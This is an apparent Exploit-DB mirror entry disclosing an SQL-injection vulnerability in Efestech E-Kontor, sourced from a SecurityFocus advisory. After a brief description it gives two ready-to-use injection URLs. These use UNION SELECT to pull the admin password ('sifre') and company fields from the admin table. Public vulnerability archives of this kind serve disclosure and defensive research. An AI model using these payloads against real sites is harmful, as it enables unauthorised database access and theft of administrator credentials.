exploit-db-mirror/platforms/php/webapps/31476.txt
Offensive Security b702913b41 Updated 02_08_2014
2014-02-08 04:27:41 +00:00

8 lines
No EOL
538 B
Text
Executable file

source: http://www.securityfocus.com/bid/28412/info
Efestech E-Kontor is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/?id=-1%20union+select+0,sifre,2,3+from+admin+where+id=1
http://www.example.com/?id=-1%20union+select+0,firma,2,3+from+admin+where+id=1